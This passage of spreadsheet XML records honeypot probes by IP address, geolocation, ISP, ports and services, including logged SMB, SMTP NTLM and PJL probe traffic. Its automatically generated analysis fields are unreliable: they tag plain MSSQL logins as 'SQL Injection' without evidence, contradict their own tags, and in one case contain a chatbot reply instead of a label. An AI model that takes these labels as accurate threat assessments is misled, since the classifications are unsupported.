    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:93b9:8422"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="This log indicates an attempted connection to a database service, likely an oracle database, which may be a sign of malicious probing or reconnaissance activity by attackers. _x000a_The attacker might be attempting to exploit vulnerabilities in the database or gain unauthorized access. _x000a_This could potentially lead to data theft or other malicious activities if successful."/>
    <s v="SQL Injection"/>
  </r>
  <r>
    <x v="689"/>
    <x v="689"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T06:12:51"/>
    <d v="2025-03-10T19:45:18"/>
    <d v="2025-04-27T06:12:51"/>
    <n v="26"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="48"/>
    <s v="Gyeongsangnam-do"/>
    <s v="Changwon-si"/>
    <s v="Changwon-si (Uichang-gu)"/>
    <s v="1846322"/>
    <s v="NA"/>
    <s v="35.3119"/>
    <s v="128.649"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:762f:31a0"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="690"/>
    <x v="690"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T06:12:12"/>
    <d v="2023-09-01T21:31:00"/>
    <d v="2025-04-27T06:12:12"/>
    <n v="881"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_MYSQL_H8&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H39&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_MSSQL_H40&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_IMAP_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;3306&amp;&amp;1433&amp;&amp;33431&amp;&amp;445&amp;&amp;35682&amp;&amp;5432&amp;&amp;25&amp;&amp;37854&amp;&amp;47902&amp;&amp;23&amp;&amp;1521&amp;&amp;44704&amp;&amp;9100&amp;&amp;39643&amp;&amp;110&amp;&amp;1080"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="NG"/>
    <s v="Nigeria"/>
    <s v="LA"/>
    <s v="Lagos"/>
    <s v="NA"/>
    <s v="Lagos"/>
    <s v="2332459"/>
    <s v="NA"/>
    <s v="6.52438"/>
    <s v="3.37921"/>
    <s v="135377"/>
    <s v="UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED"/>
    <s v="UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED"/>
    <s v="hosting"/>
    <s v="UCloud (HK) Holdings Group Limited"/>
    <s v="1992-01-10"/>
    <s v="UCLOUD-NG"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA&amp;&amp;query"/>
    <s v="NA&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'TLRMTVNTUAABAAAAB4IIOAAAAAAAAAAAAAAAAAAAAAA=', 'data': 'None'}}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,36858)}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,52598)}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,34908)}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,51550)}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,35752)}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,38302)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,95.164.21.98)}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,38312)}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,38324)}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,38340)}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,38348)}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,38352)}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,38356)}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,58884)}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,58886)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,58896)}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SOCKS5:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9820:8c0c"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="691"/>
    <x v="691"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T06:11:47"/>
    <d v="2023-11-21T17:25:22"/>
    <d v="2025-04-27T06:11:47"/>
    <n v="367"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;55987&amp;&amp;23&amp;&amp;59490&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="RO"/>
    <s v="Romania"/>
    <s v="NT"/>
    <s v="Neamț County"/>
    <s v="Municipiul Roman"/>
    <s v="Roman"/>
    <s v="668732"/>
    <s v="611001"/>
    <s v="46.9334"/>
    <s v="26.9265"/>
    <s v="12302"/>
    <s v="Vodafone Romania S.A."/>
    <s v="UPC Romania"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4e61:6a90"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No log data available, therefore cannot determine malicious activity."/>
    <m/>
  </r>
  <r>
    <x v="692"/>
    <x v="692"/>
    <s v="pool-108-41-83-90.nycmny.fios.verizon.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-27T06:10:40"/>
    <d v="2023-12-03T08:51:00"/>
    <d v="2025-04-27T06:10:40"/>
    <n v="271"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H2&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;9100&amp;&amp;445&amp;&amp;631&amp;&amp;443&amp;&amp;80&amp;&amp;1080&amp;&amp;389&amp;&amp;14143&amp;&amp;10737&amp;&amp;23&amp;&amp;NA&amp;&amp;37524"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="VA"/>
    <s v="Virginia"/>
    <s v="Loudoun"/>
    <s v="Ashburn"/>
    <s v="4744870"/>
    <s v="20149"/>
    <s v="39.0438"/>
    <s v="-77.4874"/>
    <s v="701"/>
    <s v="Verizon Business"/>
    <s v="Verizon Communications"/>
    <s v="business"/>
    <s v="MCI Communications Services, Inc. d/b/a Verizon Business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6c29:535a"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="693"/>
    <x v="693"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T05:46:02"/>
    <d v="2025-03-07T16:28:57"/>
    <d v="2025-04-27T05:46:02"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="North East"/>
    <s v="Delhi (Block C)"/>
    <s v="1273294"/>
    <s v="110007"/>
    <s v="28.7299"/>
    <s v="77.2643"/>
    <s v="140171"/>
    <s v="Reis Network Solutions"/>
    <s v="Pimoony Broadband Servivices Pvt. Ltd"/>
    <s v="business"/>
    <s v="Pimoony Broadband Services Pvt Ltd"/>
    <s v="2016-11-30"/>
    <s v="PIMOONYS"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6750:99b1"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <s v="This suggests an attempt to exploit SQL injection vulnerability, where an attacker is trying to inject malicious SQL code into the database. _x000a_The attacker may be attempting to extract sensitive information or gain unauthorized access._x000a_No valid MSSQL query was executed."/>
    <s v="SQL Injection"/>
  </r>
  <r>
    <x v="694"/>
    <x v="694"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T05:42:31"/>
    <d v="2025-02-14T10:36:00"/>
    <d v="2025-04-27T05:42:31"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c0:8a78"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="695"/>
    <x v="695"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T05:02:37"/>
    <d v="2025-02-12T04:46:22"/>
    <d v="2025-04-27T05:02:37"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75df:2f8c"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="696"/>
    <x v="696"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T04:06:48"/>
    <d v="2024-01-11T11:24:00"/>
    <d v="2025-04-27T04:06:48"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="29866&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Hisar"/>
    <s v="Hisar"/>
    <s v="1270022"/>
    <s v="NA"/>
    <s v="29.1539"/>
    <s v="75.7229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="None"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb2:92fd"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No malicious activity detected for Telnet service as the log indicates 'not available' or inactive connections. This suggests either no attempts were made to use the service or it was not set up to monitor Telnet activity. Normal and expected outcome in this case. &amp;&amp; No TELNET connections were detected during this time period, indicating that there was no attempt to connect via this protocol. No malicious activity is indicated by the lack of any connection attempts. This suggests a quiet period with no suspicious network activity."/>
    <s v="Port Scan &amp;&amp; Telnet Scan"/>
  </r>
  <r>
    <x v="697"/>
    <x v="697"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T03:44:36"/>
    <d v="2025-04-27T03:44:36"/>
    <d v="2025-04-27T03:44:36"/>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c:cae8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="698"/>
    <x v="698"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T02:23:36"/>
    <d v="2025-04-27T02:23:36"/>
    <d v="2025-04-27T02:23:36"/>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harat Sanchar Nigam Ltd"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5b:7746"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="699"/>
    <x v="699"/>
    <s v="220-132-31-158.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-27T02:15:03"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-27T02:15:03"/>
    <n v="148"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_DNS_H26&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;53&amp;&amp;27674&amp;&amp;36148&amp;&amp;50606&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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc84:1f9e"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="There is no log data provided, so I have nothing to analyze. &amp;&amp; No malicious activity detected, as there is no log data provided. &amp;&amp; Telnet access attempt was made but service status is unknown. _x000a_No further action was taken due to unknown status. _x000a_This could be an error or legitimate issue. &amp;&amp; No log data provided. _x000a__x000a_However, I can still provide some general information about what honeypot logs might indicate:_x000a__x000a_Possible malicious activity involves unauthorized access attempts to various services such as login brute forcing or probing of open ports with the intent to exploit vulnerabilities. The attacker may be attempting to gain unauthorized access to sensitive areas of a network by exploiting weaknesses in system configurations or by trying out common usernames and passwords."/>
    <s v="There's no log data provided to analyze. If you provide the log data, I'll be happy to help you identify the type of attacks. &amp;&amp; I need log data to analyze. Please provide it so I can identify the type of attack."/>
  </r>
  <r>
    <x v="700"/>
    <x v="700"/>
    <s v="c-73-93-25-112.hsd1.ca.comcast.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-27T02:13:21"/>
    <d v="2025-01-13T04:50:06"/>
    <d v="2025-04-27T02:13:21"/>
    <n v="27"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95052"/>
    <s v="37.3541"/>
    <s v="-121.955"/>
    <s v="7922"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="Comcast Cable Communications"/>
    <s v="residential"/>
    <s v="Comcast IP Services, L.L.C."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:495d:1970"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="701"/>
    <x v="701"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T02:12:28"/>
    <d v="2024-07-10T06:51:00"/>
    <d v="2025-04-27T02:12:28"/>
    <n v="114"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_LDAP_H44&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H28&amp;&amp;SMA-LAB_MSSQL_H31"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;389&amp;&amp;1433&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Virār (Vasai West)"/>
    <s v="1253133"/>
    <s v="401303"/>
    <s v="19.3812"/>
    <s v="72.8281"/>
    <s v="131442"/>
    <s v="Digital Network Associates Pvt Ltd"/>
    <s v="Signet Digital Private Limited"/>
    <s v="business"/>
    <s v="Signet Digital Pvt. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,60757)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,60834)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,55723)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,55821)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,58948)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,59035)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,49956)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,50056)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,53403)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,53489)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,58712)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,58778)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,60315)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,60441)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,60590)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,60686)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,51809)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,51885)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE 